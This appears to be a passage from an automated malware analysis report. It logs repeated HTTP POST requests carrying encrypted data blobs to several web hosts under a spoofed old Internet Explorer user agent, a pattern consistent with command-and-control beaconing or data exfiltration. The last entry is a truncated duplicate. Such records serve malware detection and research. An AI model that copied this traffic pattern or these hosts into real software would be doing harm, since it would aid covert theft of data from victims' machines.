wB9U/lG+q4a2qmRs8OPkFqrqzc8PjkqNFZJEuKI+cxAYJcCzCviekDCTJAI+scEeR9L5eeI0+JCXiKIyqTN3ZhPlW1NeypInsU5JyJi0oLF++uRzpSTSsiEPH11LISXOUbLwgXjcb7YPtP+12PvS3xictzVrNGbwmJqWwikhinitXy9F6dREWMWWjcjSdBfdtbG8P4QrS9IlAMHc9iHIDJ1nfV/Hi3fXqFsBB+cj5hTvv+XKNU4Mmy22nBBW9evz7+pkDj7ZukiNGroTBBWIKadl/YKGnSZpXkE/AKc38k8D8aWAlfKw94rO7u/xtiaHqDtq05wS4/FlbgLiXgknLpfsVO455Y1qh7irqXv3HsuO5RhuJae48slhlK6xe03q46dfwzd2qcVwrqXv/Z8ccJiqE+aCFT0taEkBSPKGfjGkmb6OGS8dXYTPQxBhvjOM3LqMfXZSyu1TM71I3s2U7hJuccEQKvT3bwFbggZ9FrhKm7rceUMxjHAIe1v63p9opvyHSaGBQ6a5zckuzMyErLaOe8C35yWnb0/XIXUNp7CfxFE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.evcpa.comCache-Control: no-cacheData Raw: 77 42 39 55 2f 6c 47 2b 71 34 61 32 71 6d 52 73 38 4f 50 6b 46 71 72 71 7a 63 38 50 6a 6b 71 4e 46 5a 4a 45 75 4b 49 2b 63 78 41 59 4a 63 43 7a 43 76 69 65 6b 44 43 54 4a 41 49 2b 73 63 45 65 52 39 4c 35 65 65 49 30 2b 4a 43 58 69 4b 49 79 71 54 4e 33 5a 68 50 6c 57 31 4e 65 79 70 49 6e 73 55 35 4a 79 4a 69 30 6f 4c 46 2b 2b 75 52 7a 70 53 54 53 73 69 45 50 48 31 31 4c 49 53 58 4f 55 62 4c 77 67 58 6a 63 62 37 59 50 74 50 2b 31 32 50 76 53 33 78 69 63 74 7a 56 72 4e 47 62 77 6d 4a 71 57 77 69 6b 68 69 6e 69 74 58 79 39 46 36 64 52 45 57 4d 57 57 6a 63 6a 53 64 42 66 64 74 62 47 38 50 34 51 72 53 39 49 6c 41 4d 48 63 39 69 48 49 44 4a 31 6e 66 56 2f 48 69 33 66 58 71 46 73 42 42 2b 63 6a 35 68 54 76 76 2b 58 4b 4e 55 34 4d 6d 79 32 32 6e 42 42 57 39 65 76 7a 37 2b 70 6b 44 6a 37 5a 75 6b 69 4e 47 72 6f 54 42 42 57 49 4b 61 64 6c 2f 59 4b 47 6e 53 5a 70 58 6b 45 2f 41 4b 63 33 38 6b 38 44 38 61 57 41 6c 66 4b 77 39 34 72 4f 37 75 2f 78 74 69 61 48 71 44 74 71 30 35 77 53 34 2f 46 6c 62 67 4c 69 58 67 6b 6e 4c 70 66 73 56 4f 34 35 35 59 31 71 68 37 69 72 71 58 76 33 48 73 75 4f 35 52 68 75 4a 61 65 34 38 73 6c 68 6c 4b 36 78 65 30 33 71 34 36 64 66 77 7a 64 32 71 63 56 77 72 71 58 76 2f 5a 38 63 63 4a 69 71 45 2b 61 43 46 54 30 74 61 45 6b 42 53 50 4b 47 66 6a 47 6b 6d 62 36 4f 47 53 38 64 58 59 54 50 51 78 42 68 76 6a 4f 4d 33 4c 71 4d 66 58 5a 53 79 75 31 54 4d 37 31 49 33 73 32 55 37 68 4a 75 63 63 45 51 4b 76 54 33 62 77 46 62 67 67 5a 39 46 72 68 4b 6d 37 72 63 65 55 4d 78 6a 48 41 49 65 31 76 36 33 70 39 6f 70 76 79 48 53 61 47 42 51 36 61 35 7a 63 6b 75 7a 4d 79 45 72 4c 61 4f 65 38 43 33 35 79 57 6e 62 30 2f 58 49 58 55 4e 70 37 43 66 78 46 45 3d Data Ascii: wB9U/lG+q4a2qmRs8OPkFqrqzc8PjkqNFZJEuKI+cxAYJcCzCviekDCTJAI+scEeR9L5eeI0+JCXiKIyqTN3ZhPlW1NeypInsU5JyJi0oLF++uRzpSTSsiEPH11LISXOUbLwgXjcb7YPtP+12PvS3xictzVrNGbwmJqWwikhinitXy9F6dREWMWWjcjSdBfdtbG8P4QrS9IlAMHc9iHIDJ1nfV/Hi3fXqFsBB+cj5hTvv+XKNU4Mmy22nBBW9evz7+pkDj7ZukiNGroTBBWIKadl/YKGnSZpXkE/AKc38k8D8aWAlfKw94rO7u/xtiaHqDtq05wS4/FlbgLiXgknLpfsVO455Y1qh7irqXv3HsuO5RhuJae48slhlK6xe03q46dfwzd2qcVwrqXv/Z8ccJiqE+aCFT0taEkBSPKGfjGkmb6OGS8dXYTPQxBhvjOM3LqMfXZSyu1TM71I3s2U7hJuccEQKvT3bwFbggZ9FrhKm7rceUMxjHAIe1v63p9opvyHSaGBQ6a5zckuzMyErLaOe8C35yWnb0/XIXUNp7CfxFE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vexcom.comCache-Control: no-cacheData Raw: 42 75 4b 5a 39 35 37 57 73 34 59 38 30 68 6a 48 36 63 32 42 73 49 47 64 75 66 6e 65 5a 4f 6c 7a 73 74 41 73 50 50 75 76 46 4d 72 74 36 37 4e 36 45 55 6b 5a 69 62 4a 69 4b 61 4d 2f 6f 52 5a 62 75 43 68 44 56 4b 53 61 50 66 33 4b 33 56 73 58 45 58 44 61 33 61 51 47 70 62 7a 6b 75 50 57 66 30 7a 63 38 73 4c 72 56 78 42 33 30 56 53 51 6a 52 70 71 45 4b 53 78 73 30 44 4e 4a 71 71 48 57 33 55 53 36 4e 73 43 6c 59 61 35 38 33 7a 30 55 52 4e 48 45 6e 65 43 46 63 77 61 61 63 68 4f 2f 56 4b 37 52 32 75 49 65 54 52 78 4e 36 6b 74 4c 72 6b 42 79 75 39 39 67 67 71 4d 57 6e 4b 44 66 4b 62 42 4d 42 2b 51 69 39 43 7a 57 39 70 72 48 6c 42 56 50 73 6d 72 59 69 48 49 73 41 4b 51 4a 79 35 39 4e 34 74 58 66 62 45 59 65 33 37 58 49 6a 70 6d 54 70 74 67 62 46 68 54 75 6d 6a 62 4f 32 6f 32 51 61 6e 53 72 55 50 37 4f 35 4e 5a 62 34 72 73 62 73 4e 35 75 4d 34 4f 72 65 33 59 48 39 45 69 4e 44 57 43 56 46 48 76 46 64 74 44 56 6a 65 6f 30 6b 33 72 56 4f 6e 42 57 54 4b 63 54 2f 65 6c 6d 64 56 7a 46 6f 45 76 2b 72 61 33 51 50 62 56 71 49 4b 2f 6d 43 36 48 52 6d 48 6f 4b 69 46 74 78 49 37 39 57 43 53 69 71 2f 59 74 4b 6d 73 55 67 37 66 53 41 6f 4e 79 37 57 6a 59 7a 52 52 42 4b 33 6b 4a 51 56 45 47 79 59 43 56 66 73 50 69 57 31 34 39 67 35 6c 30 75 32 76 39 6c 7a 68 43 39 6e 42 42 4c 79 66 49 46 48 37 76 43 6a 79 6a 6c 41 38 78 68 4f 2b 55 70 34 69 42 4e 6a 37 45 56 42 6e 78 39 34 79 67 6d 5a 43 4e 34 76 67 35 39 64 59 45 38 64 4d 7a 35 52 6f 6f 62 42 64 4a 6c 45 4d 35 4a 6b 4e 73 6e 72 37 50 4d 69 4f 48 33 4a 6e 4e 78 49 39 6e 4c 55 59 2f 56 6e 2f 65 6a 68 4e 73 61 53 31 45 58 63 76 30 33 71 41 6e 34 52 6d 75 37 49 38 64 67 34 72 52 70 55 5a 47 6d 6b 4c 30 3d Data Ascii: BuKZ957Ws4Y80hjH6c2BsIGdufneZOlzstAsPPuvFMrt67N6EUkZibJiKaM/oRZbuChDVKSaPf3K3VsXEXDa3aQGpbzkuPWf0zc8sLrVxB30VSQjRpqEKSxs0DNJqqHW3US6NsClYa583z0URNHEneCFcwaachO/VK7R2uIeTRxN6ktLrkByu99ggqMWnKDfKbBMB+Qi9CzW9prHlBVPsmrYiHIsAKQJy59N4tXfbEYe37XIjpmTptgbFhTumjbO2o2QanSrUP7O5NZb4rsbsN5uM4Ore3YH9EiNDWCVFHvFdtDVjeo0k3rVOnBWTKcT/elmdVzFoEv+ra3QPbVqIK/mC6HRmHoKiFtxI79WCSiq/YtKmsUg7fSAoNy7WjYzRRBK3kJQVEGyYCVfsPiW149g5l0u2v9lzhC9nBBLyfIFH7vCjyjlA8xhO+Up4iBNj7EVBnx94ygmZCN4vg59dYE8dMz5RoobBdJlEM5JkNsnr7PMiOH3JnNxI9nLUY/Vn/ejhNsaS1EXcv03qAn4Rmu7I8dg4rRpUZGmkL0=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 44 74 33 74 43 62 30 65 72 49 59 45 53 54 44 75 64 4e 44 67 70 2f 5a 64 56 4c 37 72 56 42 50 6b 51 65 4f 49 62 6e 7a 66 53 2f 64 42 49 35 4b 42 4d 4e 57 67 73 4e 31 41 6d 58 4c 46 42 46 43 4b 64 57 6a 73 37 73 30 39 36 31 66 79 31 64 54 73 4f 51 2b 48 32 53 74 32 4e 4b 57 69 74 78 58 4c 5a 48 66 66 56 41 41 32 49 44 57 53 37 44 72 68 52 75 45 50 63 62 35 52 62 59 70 71 49 4d 4c 48 74 48 4f 4b 37 71 68 63 75 68 41 39 6e 4b 47 35 62 4b 41 61 77 54 57 6a 49 4f 35 4b 67 66 69 34 74 55 30 62 64 7a 52 74 72 53 51 44 66 4c 4d 2f 7a 76 70 51 75 79 58 72 7a 64 37 63 4d 4a 45 6a 48 72 34 56 52 45 4e 6a 78 49 73 69 6d 74 64 6b 72 63 75 50 46 4a 32 30 4d 41 78 51 36 6f 65 76 4f 35 77 66 4e 78 74 49 4e 75 6d 30 51 44 4e 63 44 35 6b 6f 39 58 55 74 33 78 72 69 2f 66 53 75 4c 42 66 4d 78 5a 64 4f 5a 57 37 63 30 52 6d 31 73 6b 67 44 4c 33 4c 4d 61 2f 39 30 71 6f 36 2b 79 50 66 2f 33 6b 55 7a 78 54 52 50 42 76 58 61 78 54 76 73 76 67 6c 66 37 6a 4a 4e 63 6a 46 37 75 6b 47 6c 42 6a 77 37 79 6c 54 39 74 2b 51 4c 58 49 79 45 6f 5a 64 48 55 65 4c 53 73 62 56 75 77 7a 69 56 54 73 30 6b 6b 6f 76 5a 4d 54 63 6c 6d 4b 72 48 76 7a 59 37 58 49 67 4f 38 74 47 4f 59 66 54 68 34 47 53 33 70 59 6b 6c 37 59 66 54 36 34 6c 68 44 61 6c 6b 53 53 45 77 73 73 78 46 4b 63 61 6e 44 6c 41 4a 72 31 65 76 62 71 36 35 5a 2f 39 6d 30 63 72 62 6a 49 33 68 54 37 4f 77 46 44 4f 33 62 6d 4d 77 54 44 35 71 49 52 6f 70 72 52 50 67 73 41 64 49 4e 38 46 77 57 39 61 53 65 69 44 38 6f 47 43 58 33 36 6d 2b 7a 6a 46 6d 32 4f 65 74 57 64 45 67 6a 77 56 34 4e 62 32 4b 77 71 38 34 4e 41 58 4c 49 71 51 45 45 4f 6d 6e 48 39 4a 77 35 61 52 65 62 6c 72 69 43 6c 35 39 62 6e 66 71 44 66 74 77 6a 78 4d 4b 53 38 78 7a 62 77 3d 3d Data Ascii: Dt3tCb0erIYESTDudNDgp/ZdVL7rVBPkQeOIbnzfS/dBI5KBMNWgsN1AmXLFBFCKdWjs7s0961fy1dTsOQ+H2St2NKWitxXLZHffVAA2IDWS7DrhRuEPcb5RbYpqIMLHtHOK7qhcuhA9nKG5bKAawTWjIO5Kgfi4tU0bdzRtrSQDfLM/zvpQuyXrzd7cMJEjHr4VRENjxIsimtdkrcuPFJ20MAxQ6oevO5wfNxtINum0QDNcD5ko9XUt3xri/fSuLBfMxZdOZW7c0Rm1skgDL3LMa/90qo6+yPf/3kUzxTRPBvXaxTvsvglf7jJNcjF7ukGlBjw7ylT9t+QLXIyEoZdHUeLSsbVuwziVTs0kkovZMTclmKrHvzY7XIgO8tGOYfTh4GS3pYkl7YfT64lhDalkSSEwssxFKcanDlAJr1evbq65Z/9m0crbjI3hT7OwFDO3bmMwTD5qIRoprRPgsAdIN8FwW9aSeiD8oGCX36m+zjFm2OetWdEgjwV4Nb2Kwq84NAXLIqQEEOmnH9Jw5aReblriCl59bnfqDftwjxMKS8xzbw==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 6e 69 57 54 39 32 72 57 73 34 61 32 2f 51 61 64 54 52 4a 5a 71 79 33 50 52 6b 4b 61 6a 68 4c 5a 50 73 39 70 54 36 70 58 36 6a 36 64 61 79 34 44 63 55 61 77 6f 5a 7a 63 45 78 68 4b 44 34 5a 71 4b 69 64 61 6e 33 58 48 52 36 70 4a 67 32 32 70 7a 41 63 7a 69 46 65 73 45 63 73 37 32 64 62 6b 2b 59 6c 46 52 64 64 64 4e 41 7a 4d 72 30 6b 64 55 62 52 50 33 57 2f 66 57 52 50 69 50 31 64 5a 4c 45 6d 53 58 49 45 47 58 56 78 47 6b 6c 36 42 4e 55 68 6e 6b 39 5a 33 47 2f 4a 4d 4e 77 31 79 4a 50 6d 37 53 49 59 54 43 54 70 78 6f 77 6e 74 64 54 34 70 44 68 65 31 53 61 55 42 79 72 53 51 62 65 2b 79 6c 45 76 6f 6f 71 64 56 6e 79 6a 6f 58 30 65 46 4b 50 72 49 35 72 6c 59 64 62 68 33 42 77 69 65 7a 68 2f 34 32 70 6a 7a 52 63 51 50 6d 57 36 47 58 77 71 71 45 48 54 53 67 62 41 39 6b 64 32 4b 69 64 42 54 34 6b 50 46 30 6f 38 6a 70 52 39 73 30 33 51 35 31 58 68 31 48 39 70 7a 63 38 51 76 36 49 31 71 6f 77 63 70 44 63 65 58 67 72 53 34 76 41 75 75 72 6c 66 36 59 55 2b 79 4b 35 71 4f 4c 6d 37 4a 67 6e 52 38 75 69 35 66 76 4a 56 44 44 63 31 64 2b 47 75 72 59 64 35 32 33 65 57 41 48 73 6a 41 36 66 79 69 61 45 33 66 58 32 7a 78 69 30 31 79 47 49 54 57 70 59 62 43 47 49 54 73 7a 4b 46 61 42 69 32 71 48 43 4e 75 62 6d 51 37 44 63 52 31 67 4f 39 71 58 57 71 7a 6a 57 7a 44 6c 35 64 6e 66 72 71 4f 6f 62 70 79 6b 7a 4b 65 32 45 59 35 77 5a 46 32 6a 63 77 67 46 39 41 32 73 36 75 6c 4d 4f 36 43 66 77 64 2b 4d 63 59 73 2f 35 32 6d 2f 44 43 37 57 31 66 35 50 39 4c 63 50 59 63 31 4b 37 48 42 68 71 66 65 72 33 6a 64 56 65 77 59 4c 41 77 69 56 50 45 6c 41 69 31 6c 4c 46 70 32 77 56 53 57 78 73 61 59 31 4f 6d 75 48 78 57 45 77 6d 7a 6e 67 53 41 3d Data Ascii: niWT92rWs4a2/QadTRJZqy3PRkKajhLZPs9pT6pX6j6day4DcUawoZzcExhKD4ZqKidan3XHR6pJg22pzAcziFesEcs72dbk+YlFRdddNAzMr0kdUbRP3W/fWRPiP1dZLEmSXIEGXVxGkl6BNUhnk9Z3G/JMNw1yJPm7SIYTCTpxowntdT4pDhe1SaUByrSQbe+ylEvooqdVnyjoX0eFKPrI5rlYdbh3Bwiezh/42pjzRcQPmW6GXwqqEHTSgbA9kd2KidBT4kPF0o8jpR9s03Q51Xh1H9pzc8Qv6I1qowcpDceXgrS4vAuurlf6YU+yK5qOLm7JgnR8ui5fvJVDDc1d+GurYd523eWAHsjA6fyiaE3fX2zxi01yGITWpYbCGITszKFaBi2qHCNubmQ7DcR1gO9qXWqzjWzDl5dnfrqOobpykzKe2EY5wZF2jcwgF9A2s6ulMO6Cfwd+McYs/52m/DC7W1f5P9LcPYc1K7HBhqfer3jdVewYLAwiVPElAi1lLFp2wVSWxsaY1OmuHxWEwmzngSA=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 41 37 64 4c 68 33 79 51 6e 34 59 79 53 32 36 45 4a 37 45 32 77 67 38 5a 73 7a 30 55 6a 36 78 66 63 4b 6c 57 6a 55 31 63 32 55 72 68 37 2f 63 4b 30 35 6f 2f 77 6c 62 58 51 36 52 50 41 58 74 6c 59 38 53 6b 79 32 66 65 45 5a 6c 6a 61 6d 49 39 70 77 59 55 71 42 68 57 68 66 68 71 33 59 49 70 39 65 38 32 6c 4e 6d 49 41 5a 47 64 63 71 31 61 63 2b 61 4f 69 57 72 4c 48 38 45 47 4c 4d 36 62 63 34 44 47 6f 6b 6d 77 2b 52 4e 51 53 35 59 61 44 32 76 52 52 34 6e 33 4e 50 6f 52 6b 78 50 43 69 33 66 72 4f 53 45 41 77 42 42 6c 4d 30 72 34 34 77 42 72 4a 32 67 74 6f 7a 4c 4c 39 58 36 68 4f 56 39 74 6f 56 77 69 74 67 78 32 36 6d 33 4d 49 56 68 5a 46 67 31 56 4e 77 55 74 46 35 46 6f 4a 59 71 41 30 49 69 58 73 66 51 6b 51 53 2b 33 6d 4e 69 53 62 4d 78 70 2b 4b 50 5a 78 71 56 59 76 35 4d 50 45 64 49 65 49 7a 74 75 52 62 32 43 6c 69 5a 39 72 49 48 6b 65 2f 6e 61 48 71 33 53 39 35 56 36 30 31 30 35 68 50 38 5a 34 73 49 58 47 66 30 63 6b 44 58 6c 61 63 43 2f 7a 57 74 78 71 2b 76 57 48 6e 69 31 7a 45 48 4e 37 34 66 6f 63 2f 50 4f 65 51 32 34 34 64 69 49 44 2b 44 33 45 38 52 77 6d 4f 33 65 6d 74 68 4b 32 4d 54 78 39 79 66 6f 52 64 36 79 46 66 48 79 55 4a 4b 2f 78 74 53 57 78 57 36 6e 6c 2f 4b 37 4d 34 61 56 33 74 41 62 72 67 4e 39 2b 57 63 6b 63 59 62 44 63 30 51 74 4d 4a 51 78 4b 31 31 53 70 39 58 49 4a 6a 77 4b 70 37 78 73 39 71 2f 52 37 75 36 5a 56 6e 70 54 37 38 6e 79 33 73 34 51 6a 45 68 33 61 64 52 63 34 61 50 42 4c 30 67 77 64 42 64 72 73 6a 66 76 50 46 34 72 68 56 42 46 41 43 4c 71 78 71 6d 57 79 57 4e 2f 4b 5a 30 75 6d 55 46 70 74 70 62 30 49 37 62 4c 63 36 56 61 66 48 48 6d 77 70 2f 68 33 57 73 49 70 4f 6c 65 56 63 72 4c 59 55 78 67 64 36 35 37 55 54 73 75 7a 6c 64 61 6e 4a 34 35 37 6b 34 3d Data Ascii: A7dLh3yQn4YyS26EJ7E2wg8Zsz0Uj6xfcKlWjU1c2Urh7/cK05o/wlbXQ6RPAXtlY8Sky2feEZljamI9pwYUqBhWhfhq3YIp9e82lNmIAZGdcq1ac+aOiWrLH8EGLM6bc4DGokmw+RNQS5YaD2vRR4n3NPoRkxPCi3frOSEAwBBlM0r44wBrJ2gtozLL9X6hOV9toVwitgx26m3MIVhZFg1VNwUtF5FoJYqA0IiXsfQkQS+3mNiSbMxp+KPZxqVYv5MPEdIeIztuRb2CliZ9rIHke/naHq3S95V60105hP8Z4sIXGf0ckDXlacC/zWtxq+vWHni1zEHN74foc/POeQ244diID+D3E8RwmO3emthK2MTx9yfoRd6yFfHyUJK/xtSWxW6nl/K7M4aV3tAbrgN9+WckcYbDc0QtMJQxK11Sp9XIJjwKp7xs9q/R7u6ZVnpT78ny3s4QjEh3adRc4aPBL0gwdBdrsjfvPF4rhVBFACLqxqmWyWN/KZ0umUFptpb0I7bLc6VafHHmwp/h3WsIpOleVcrLYUxgd657UTsuzldanJ457k4=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 38 79 5a 41 77 51 52 6a 75 6f 62 73 67 55 78 6d 48 35 4b 39 41 74 66 30 30 44 67 38 71 45 70 38 65 4b 44 49 47 6f 45 32 62 5a 4c 4a 49 7a 49 43 67 44 55 4f 61 38 4f 54 4c 47 45 4d 4d 6c 46 48 69 6a 77 4e 65 6d 79 67 75 4e 66 68 4c 36 6a 4c 55 77 74 5a 54 78 2f 30 36 30 51 4c 45 69 4a 56 6c 52 71 6f 6d 46 49 6b 33 31 34 31 4c 33 6a 2f 6b 32 63 5a 6d 53 37 79 57 73 41 42 6d 32 47 5a 6a 52 54 52 66 6a 54 53 59 45 32 50 59 62 51 32 73 78 54 76 58 57 44 46 5a 36 79 33 65 43 2f 44 68 49 76 6a 34 57 5a 56 53 70 63 71 78 57 51 6e 6f 37 77 55 76 38 4b 68 36 59 71 4e 56 69 65 30 31 41 30 44 35 76 72 54 2f 68 70 42 47 6a 6f 33 39 71 42 56 57 33 35 49 64 4b 42 49 53 37 46 4a 6e 36 6f 36 4c 65 36 66 69 6e 2b 30 62 67 36 4e 58 4c 54 4a 58 79 68 44 6a 46 74 75 46 4c 70 4a 6b 6a 67 35 37 74 72 54 6c 42 38 67 54 43 41 4c 48 51 4f 77 64 37 76 6f 54 47 35 73 49 68 41 36 6a 57 64 75 51 53 47 6e 37 76 4e 37 4c 45 76 62 4a 70 55 43 4b 33 77 55 59 76 36 58 65 46 6e 2f 69 6e 74 6d 6b 33 4d 73 71 43 71 71 46 66 67 53 63 55 44 52 50 4c 61 51 59 52 34 52 63 35 72 6c 63 4f 52 74 43 76 4e 51 2b 4b 74 53 49 61 43 2b 4f 30 42 6d 48 36 54 35 51 54 38 53 38 42 38 46 62 32 6f 69 75 61 6f 59 48 5a 4c 39 75 66 41 38 72 77 67 43 36 4d 39 70 6f 4e 7a 35 68 4e 42 72 7a 2f 42 6d 4d 44 38 7a 37 44 69 41 55 4a 43 47 4c 70 77 31 6d 4c 69 78 78 53 47 77 6f 34 61 4a 54 57 36 61 6b 38 42 73 38 76 4c 66 57 34 66 4a 63 59 6c 72 75 74 73 2b 61 35 73 48 4b 51 48 4b 74 77 76 67 47 2b 73 2b 4f 6e 67 6d 31 4e 49 67 6f 67 42 69 78 4d 4c 76 6c 47 68 32 69 69 71 31 54 6f 55 50 6f 30 46 30 34 59 35 39 68 67 56 51 46 51 4b 35 4e 6a 59 34 46 34 38 55 4e 79 31 39 6c 41 76 72 62 79 7a 44 32 53 69 76 41 36 4b 4f 38 67 2b 53 6f 73 6a 67 59 52 56 49 32 79 6a 59 46 39 33 71 65 4d 34 6d 49 4a 63 4f Data Ascii: 8yZAwQRjuobsgUxmH5K9Atf00Dg8qEp8eKDIGoE2bZLJIzICgDUOa8OTLGEMMlFHijwNemyguNfhL6jLUwtZTx/060QLEiJVlRqomFIk3141L3j/k2cZmS7yWsABm2GZjRTRfjTSYE2PYbQ2sxTvXWDFZ6y3eC/DhIvj4WZVSpcqxWQno7wUv8Kh6YqNVie01A0D5vrT/hpBGjo39qBVW35IdKBIS7FJn6o6Le6fin+0bg6NXLTJXyhDjFtuFLpJkjg57trTlB8gTCALHQOwd7voTG5sIhA6jWduQSGn7vN7LEvbJpUCK3wUYv6XeFn/intmk3MsqCqqFfgScUDRPLaQYR4Rc5rlcORtCvNQ+KtSIaC+O0BmH6T5QT8S8B8Fb2oiuaoYHZL9ufA8rwgC6M9poNz5hNBrz/BmMD8z7DiAUJCGLpw1mLixxSGwo4aJTW6ak8Bs8vLfW4fJcYlruts+a5sHKQHKtwvgG+s+Ongm1NIgogBixMLvlGh2iiq1ToUPo0F04Y59hgVQFQK5NjY4F48UNy19lAvrbyzD2SivA6KO8g+SosjgYRVI2yjYF93qeM4mIJcO
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 42 73 2b 30 76 74 31 4e 75 6f 62 78 38 45 42 38 46 50 56 2f 36 52 62 2b 6f 41 2b 4c 67 6b 76 4b 59 58 77 32 71 53 79 35 54 76 36 51 47 61 4a 6f 34 61 6c 65 58 6d 53 39 42 43 4a 69 31 42 79 59 74 68 37 51 4f 43 6a 6d 70 46 41 73 76 2f 2b 38 30 50 49 75 69 6f 45 54 48 2f 45 32 65 66 55 63 50 4b 58 34 4c 69 72 4f 69 48 41 35 51 63 34 71 75 45 73 55 32 5a 6f 52 71 76 71 31 74 47 44 47 65 4d 37 30 6e 78 46 69 4d 6c 4b 46 67 78 35 59 4d 4b 76 78 54 4f 54 45 4c 59 52 4d 51 67 44 2f 36 2b 35 36 47 54 6c 78 4c 6d 5a 73 4d 63 76 4e 4f 31 67 74 4e 79 6c 4e 50 36 34 4d 69 34 6e 61 79 36 67 72 50 5a 4f 36 51 46 36 6f 49 38 4a 45 35 64 66 63 33 46 76 48 44 37 6b 45 67 56 6f 53 41 70 6a 56 69 78 34 44 4b 77 59 57 48 6c 31 67 38 37 53 4d 46 54 63 61 63 6b 6a 4d 37 51 43 6e 35 65 54 69 47 2f 44 64 73 51 74 67 6a 46 47 68 2f 47 74 76 44 35 52 55 42 2f 37 53 70 2b 52 4a 31 4d 73 7a 31 64 4b 74 50 2b 57 48 65 33 55 67 6c 32 33 7a 33 76 52 2b 69 41 41 66 70 2b 48 77 58 69 39 35 37 4d 45 61 7a 6e 49 44 61 77 58 43 74 61 76 32 69 35 30 58 62 50 78 4e 6f 75 6d 5a 39 77 55 51 2b 51 62 41 77 33 57 76 56 79 71 48 74 35 7a 48 55 6f 77 6f 43 56 54 66 54 6e 62 6a 4d 6d 46 6e 4b 6a 6d 36 6a 72 43 70 30 71 47 45 39 55 66 70 42 75 47 36 71 6a 44 6e 6f 49 4e 68 36 6f 44 43 75 68 71 76 68 2b 65 77 52 4f 59 77 78 2b 62 4e 34 48 6b 78 5a 58 70 4e 2f 42 32 6d 2f 48 4b 69 73 37 71 39 71 34 44 55 41 59 65 53 55 52 62 43 44 35 61 63 6e 6d 57 57 61 39 52 58 47 39 32 35 44 31 4f 49 46 64 50 51 63 4b 42 71 6a 4c 6b 54 63 32 41 79 45 6a 2b 68 69 4d 7a 66 49 64 76 48 50 6e 47 76 57 64 76 41 45 39 54 58 64 68 4d 36 4b 58 78 65 75 4d 36 73 66 63 52 73 2b 69 31 48 76 6a 6f 39 52 78 6f 44 51 36 73 41 50 2b 32 76 48 77 33 6c 78 6f 52 71 77 45 74 45 61 2f 63 51 49 66 58 56 2f 68 41 54 Data Ascii: Bs+0vt1Nuobx8EB8FPV/6Rb+oA+LgkvKYXw2qSy5Tv6QGaJo4aleXmS9BCJi1ByYth7QOCjmpFAsv/+80PIuioETH/E2efUcPKX4LirOiHA5Qc4quEsU2ZoRqvq1tGDGeM70nxFiMlKFgx5YMKvxTOTELYRMQgD/6+56GTlxLmZsMcvNO1gtNylNP64Mi4nay6grPZO6QF6oI8JE5dfc3FvHD7kEgVoSApjVix4DKwYWHl1g87SMFTcackjM7QCn5eTiG/DdsQtgjFGh/GtvD5RUB/7Sp+RJ1Msz1dKtP+WHe3Ugl23z3vR+iAAfp+HwXi957MEaznIDawXCtav2i50XbPxNoumZ9wUQ+QbAw3WvVyqHt5zHUowoCVTfTnbjMmFnKjm6jrCp0qGE9UfpBuG6qjDnoINh6oDCuhqvh+ewROYwx+bN4HkxZXpN/B2m/HKis7q9q4DUAYeSURbCD5acnmWWa9RXG925D1OIFdPQcKBqjLkTc2AyEj+hiMzfIdvHPnGvWdvAE9TXdhM6KXxeuM6sfcRs+i1Hvjo9RxoDQ6sAP+2vHw3lxoRqwEtEa/cQIfXV/hAT
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 42 73 2b 30 76 74 31 4e 75 6f 62 78 38 45 42 38 46 50 56 2f 36 52 62 2b 6f 41 2b 4c 67 6b 76 4b 59 58 77 32 71 53 79 35 54 76 36 51 47 61 4a 6f 34 61 6c 65 58 6d 53 39 42 43 4a 69 31 42 79 59 74 68 37 51 4f 43 6a 6d 70 46 41 73 76 2f 2b 38 30 50 49 75 69 6f 45 54 48 2f 45 32 65 66 55 63 50 4b 58 34 4c 69 72 4f 69 48 41 35 51 63 34 71 75 45 73 55 32 5a 6f 52 71 76 71 31 74 47 44 47 65 4d 37 30 6e 78 46 69 4d 6c 4b 46 67 78 35 59 4d 4b 76 78 54 4f 54 45 4c 59 52 4d 51 67 44 2f 36 2b 35 36 47 54 6c 78 4c 6d 5a 73 4d 63 76 4e 4f 31 67 74 4e 79 6c 4e 50 36 34 4d 69 34 6e 61 79 36 67 72 50 5a 4f 36 51 46 36 6f 49 38 4a 45 35 64 66 63 33 46 76 48 44 37 6b 45 67 56 6f 53 41 70 6a 56 69 78 34 44 4b 77 59 57 48 6c 31 67 38 37 53 4d 46 54 63 61 63 6b 6a 4d 37 51 43 6e 35 65 54 69 47 2f 44 64 73 51 74 67 6a 46 47 68 2f 47 74 76 44 35 52 55 42 2f 37 53 70 2b 52 4a 31 4d 73 7a 31 64 4b 74 50 2b 57 48 65 33 